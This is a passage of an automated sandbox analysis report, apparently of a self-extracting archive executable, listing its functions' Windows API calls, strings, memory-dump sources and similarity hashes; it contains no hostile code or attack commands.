WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0073A232
__freea.LIBCMT ref: 0073A23F

Part of subcall function 00738518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0073C13D,00000000,?,007367E2,?,00000008,?,007389AD,?,?,?), ref: 0073854A

__freea.LIBCMT ref: 0073A248
__freea.LIBCMT ref: 0073A26D

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: f1eb1ef3af533ac4209f91476ae891fea887dfe735f414cfbc88d5e62c641f00
Instruction ID: 676aebf7190627b650d7d43991c9cac253f9a89714f55b62582a163e4bef0d1a
Opcode Fuzzy Hash: f1eb1ef3af533ac4209f91476ae891fea887dfe735f414cfbc88d5e62c641f00
Instruction Fuzzy Hash: 6451C37261021ABFFB258E64CC46EBB77A9EB85750F154229FC84D6142DB3EDC408662

Uniqueness

Uniqueness Score: -1.00%

Function 0072A335 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00720085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007200A0
Part of subcall function 00720085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0071EB86,Crypt32.dll,00000000,0071EC0A,?,?,0071EBEC,?,?,?), ref: 007200C2

OleInitialize.OLE32(00000000), ref: 0072A34E
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0072A385
SHGetMalloc.SHELL32(00758430), ref: 0072A38F

Strings

3To, xrefs: 0072A366
riched20.dll, xrefs: 0072A33D

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3To
API String ID: 3498096277-2168385784
Opcode ID: b47c10c87a570747d51f69815228192edd50e3efabe18aeb0ced83369746af96
Instruction ID: 38b2c731ab5a6093a236cf228854d7067780a6d9afbf6209015cdc2baf0e32aa
Opcode Fuzzy Hash: b47c10c87a570747d51f69815228192edd50e3efabe18aeb0ced83369746af96
Instruction Fuzzy Hash: E3F0FFB1D0021DABDB10AF99D8499EFFBFCEF95751F00415AE814E2201DBB85645CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 007199B0 Relevance: 7.6, APIs: 5, Instructions: 117
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,007178AD,?,00000005,?,00000011), ref: 00719A4C
GetLastError.KERNEL32(?,?,007178AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00719A59
CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,007178AD,?,00000005,?), ref: 00719A8E
GetLastError.KERNEL32(?,?,007178AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00719A96
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,007178AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00719ADB

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: fdc097f1d0dcc8d97f59325bb2a4d8c0818b66625482328e76e83da5a7d52ab5
Instruction ID: 002255a27a9e6d10e6b71fd470974eeb81e1ead607f4b549a8d205e9a4dae207
Opcode Fuzzy Hash: fdc097f1d0dcc8d97f59325bb2a4d8c0818b66625482328e76e83da5a7d52ab5
Instruction Fuzzy Hash: AA413370544745AFE3208B28DC09BDABAE0BF05324F10471AF6A4961D1E779A9CDCB95

Uniqueness

Uniqueness Score: -1.00%

Function 0072AC74 Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0072AC85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0072AC96
IsDialogMessageW.USER32(00010472,?), ref: 0072ACAA
TranslateMessage.USER32(?), ref: 0072ACB8
DispatchMessageW.USER32(?), ref: 0072ACC2

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 2fcc24a8d29216aaad28f17af0a0a9809f16a7f3a20a4c64a6897921c3de459d
Instruction ID: 97d078e3c8b9d5af1984335e5b04b9f294daf3090b2c2dbb5e52303297fcd6ec
Opcode Fuzzy Hash: 2fcc24a8d29216aaad28f17af0a0a9809f16a7f3a20a4c64a6897921c3de459d
Instruction Fuzzy Hash: 17F0BD71D01229BB8B209BE5AC4CEEB7F6CEF052917408515F919D2111EA3CD586C7B5

Uniqueness

Uniqueness Score: -1.00%

Function 0072A2C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 0072A2DE
SHAutoComplete.SHLWAPI(?,00000010), ref: 0072A315

Part of subcall function 007217AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0071BB05,00000000,.exe,?,?,00000800,?,?,007285DF,?), ref: 007217C2

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0072A305

Strings

EDIT, xrefs: 0072A2E9, 0072A2F4, 0072A301

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 93964b4c9c7d3bede2e3121f2d255a4cb98f3eb2df7dadbc06b19e693d84da61
Instruction ID: 6eb563f218f8c288f865dd25fa29ddcca99d7e42cdf9a1dbf534d6892561e547
Opcode Fuzzy Hash: 93964b4c9c7d3bede2e3121f2d255a4cb98f3eb2df7dadbc06b19e693d84da61
Instruction Fuzzy Hash: 90F0AE32A0123C77D73096546C05FDB776CDF46B50F444065BD09E2181D7689D42C5FA

Uniqueness

Uniqueness Score: -1.00%

Function 0072D287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0072D29D
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0072D2D9

Strings

sfxpar, xrefs: 0072D2D4
sfxcmd, xrefs: 0072D298

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: ec34aba9bc869ad4e1289b57d7c64c2ca3c960459743207eb625b9ff1aac97d5
Instruction ID: dc67b4379e498ff30ca9c212d171bb3edc950faf5fa3bd3261204eb22dd18329
Opcode Fuzzy Hash: ec34aba9bc869ad4e1289b57d7c64c2ca3c960459743207eb625b9ff1aac97d5
Instruction Fuzzy Hash: C7F0A7B690063CE7C7306FA4AC19AFA77D8BF09741B014116FC8856152D76CCD40D6F5

Uniqueness

Uniqueness Score: -1.00%

Function 0071984E Relevance: 6.1, APIs: 4, Instructions: 57
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 0071985E
ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00719876
GetLastError.KERNEL32 ref: 007198A8
GetLastError.KERNEL32 ref: 007198C7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 3cd37bfecd5dabf9974b30eb95a689bc9a13985259711f02b449942dc81c9012
Instruction ID: 002352245292ab5db3d04e309129c7f78fd7707700a2fd38b60ecc23cac17d43
Opcode Fuzzy Hash: 3cd37bfecd5dabf9974b30eb95a689bc9a13985259711f02b449942dc81c9012
Instruction Fuzzy Hash: AD11AC30900218EBDB205F59C824AE977A9EB43730F10C22AFA2A855D0D73DDE829F51

Uniqueness

Uniqueness Score: -1.00%

Function 0073A4F4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00733713,00000000,00000000,?,0073A49B,00733713,00000000,00000000,00000000,?,0073A698,00000006,FlsSetValue), ref: 0073A526
GetLastError.KERNEL32(?,0073A49B,00733713,00000000,00000000,00000000,?,0073A698,00000006,FlsSetValue,00747348,00747350,00000000,00000364,?,00739077), ref: 0073A532
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0073A49B,00733713,00000000,00000000,00000000,?,0073A698,00000006,FlsSetValue,00747348,00747350,00000000), ref: 0073A540

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 4bdfaf24aeff2858beb7fb81738a922cf10e4ae7bcebb181e84de4854bb794ad
Instruction ID: 8f5feab8c1cdc2746ee928e75ed42f1d0b4f561fbeb0ad4ab338a7cfa02aeb0b
Opcode Fuzzy Hash: 4bdfaf24aeff2858beb7fb81738a922cf10e4ae7bcebb181e84de4854bb794ad
Instruction Fuzzy Hash: 1C017B36701236BBDB208B689C46A567B98EF02BA1F204221F94BD7151D73CD910C6E5

Uniqueness

Uniqueness Score: -1.00%

Function 0073B188 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00738FA5: GetLastError.KERNEL32(?,00750EE8,00733E14,00750EE8,?,?,00733713,00000050,?,00750EE8,00000200), ref: 00738FA9
Part of subcall function 00738FA5: _free.LIBCMT ref: 00738FDC
Part of subcall function 00738FA5: SetLastError.KERNEL32(00000000,?,00750EE8,00000200), ref: 0073901D
Part of subcall function 00738FA5: _abort.LIBCMT ref: 00739023

Part of subcall function 0073B2AE: _abort.LIBCMT ref: 0073B2E0
Part of subcall function 0073B2AE: _free.LIBCMT ref: 0073B314

Part of subcall function 0073AF1B: GetOEMCP.KERNEL32(00000000,?,?,0073B1A5,?), ref: 0073AF46

_free.LIBCMT ref: 0073B200
_free.LIBCMT ref: 0073B236

Strings

t, xrefs: 0073B22A

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID: t
API String ID: 2991157371-1107187082
Opcode ID: c86f64f0ac2ba97875796190353b289602727173b0454b873e2f2b317ac9dcc4
Instruction ID: 122f3a09a7b0d7f4ae0f357b8bdb41bbf54865fbda0e00c6b181c5ea106e3868
Opcode Fuzzy Hash: c86f64f0ac2ba97875796190353b289602727173b0454b873e2f2b317ac9dcc4
Instruction Fuzzy Hash: AD31D131900208EFEB10EFA9C845BAEB7E5FF41320F254199F6149B293EB7A9D41CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00719F2F Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,0071CC94,00000001,?,?,?,00000000,00724ECD,?,?,?), ref: 00719F4C
WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00724ECD,?,?,?,?,?,00724972,?), ref: 00719F8E
WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,0071CC94,00000001,?,?), ref: 00719FB8

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: e66903c57a3aecfe26e9e66165e4d2e448ebc4a0e35512921d3e3300a6496640
Instruction ID: d47ad43d52b1bf744ee5e96b14ceedd1853c584b2b580279d8201074ad60174a
Opcode Fuzzy Hash: e66903c57a3aecfe26e9e66165e4d2e448ebc4a0e35512921d3e3300a6496640
Instruction Fuzzy Hash: 56313570608301AFDF148F18D918BAABBA8EF55710F04861DF949DB1C1C778DD8ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0071A207 Relevance: 4.6, APIs: 3, Instructions: 56COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0071A113,?,00000001,00000000,?,?), ref: 0071A22E
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0071A113,?,00000001,00000000,?,?), ref: 0071A261
GetLastError.KERNEL32(?,?,?,?,0071A113,?,00000001,00000000,?,?), ref: 0071A27E

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: CreateDirectory$ErrorLast
String ID:
API String ID: 2485089472-0
Opcode ID: 7a5429b3249fe5c069ca498eecbeb7c81d07b2acdab9f51fa5355a44907fb8d3
Instruction ID: 95982b7d8ed08dfddc72c2b7423e1564880937483fbcb7d24ae73c3248127274
Opcode Fuzzy Hash: 7a5429b3249fe5c069ca498eecbeb7c81d07b2acdab9f51fa5355a44907fb8d3
Instruction Fuzzy Hash: AA018031542228B6DB329BAC5C09BE93358BF5A741F044456F805D50D1D77E8AC1C6A7

Uniqueness

Uniqueness Score: -1.00%

Function 0071C827 Relevance: 4.6, APIs: 3, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0071C82C
new.LIBCMT ref: 0071C86F
new.LIBCMT ref: 0071C893

Part of subcall function 00716057: __EH_prolog.LIBCMT ref: 0071605C

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 0f451acfb49368ef075b43449512e34d5c09fb5385c14289edfc1794e35371ec
Instruction ID: aebe6db5eb6fc01c41800c939e7425437f69d39a3d9aa2e126ef654afa3b5581
Opcode Fuzzy Hash: 0f451acfb49368ef075b43449512e34d5c09fb5385c14289edfc1794e35371ec
Instruction Fuzzy Hash: C51173B1E01354DADB15EBBC99497EEB6F8EF44300F14046EE44AD3282DB789E44D762

Uniqueness

Uniqueness Score: -1.00%

Function 0073AFF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0073B019

Strings

, xrefs: 0073B05E

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: cbd87a4275aaf75e14a13dcbf8ef43fb0f6fce9e5138f822b3be06f963be4573
Instruction ID: dc81b64d04f52899304cf38d0556f5976a332c282c0676918f65a234fbaf9294
Opcode Fuzzy Hash: cbd87a4275aaf75e14a13dcbf8ef43fb0f6fce9e5138f822b3be06f963be4573
Instruction Fuzzy Hash: 2C41087150438C9AEF258A648C95BF7BBB9EB45304F1404EDE69A87143E3399A45DF20

Uniqueness

Uniqueness Score: -1.00%

Function 0073A72C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 0073A79D

Strings

LCMapStringEx, xrefs: 0073A73D, 0073A747

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 0f439e7d5358073102bb8642db4359636a784a6ef5cfd9f22b35aa6e0525296b
Instruction ID: 4409282c0949ebe8622c9f774d7efefe2124208f9ae03433c94475d3a253e09b
Opcode Fuzzy Hash: 0f439e7d5358073102bb8642db4359636a784a6ef5cfd9f22b35aa6e0525296b
Instruction Fuzzy Hash: 8501137250020CBBCF065FA0DC06DAE3F66FF09720F008114FE1825161CB7A8931EB91

Uniqueness

Uniqueness Score: -1.00%

Function 0073A6CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00739D2F), ref: 0073A715

Strings

InitializeCriticalSectionEx, xrefs: 0073A6E5

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: b39e2e730c405f3a5bfdd425811bd0055b1d5ede62f86f0ee71a72a964391fdb
Instruction ID: 5b55798709cd716224dafc9ef36cc293cf94b11f5a2ae8f61effae420cd212dd
Opcode Fuzzy Hash: b39e2e730c405f3a5bfdd425811bd0055b1d5ede62f86f0ee71a72a964391fdb
Instruction Fuzzy Hash: 39F02E7060020CBBCF006F60CC0ACAE7F61EF05B20F008025FC081A221CB794A20EB92

Uniqueness

Uniqueness Score: -1.00%

Function 0073A56F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0073A5AE

Strings

FlsAlloc, xrefs: 0073A58A

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
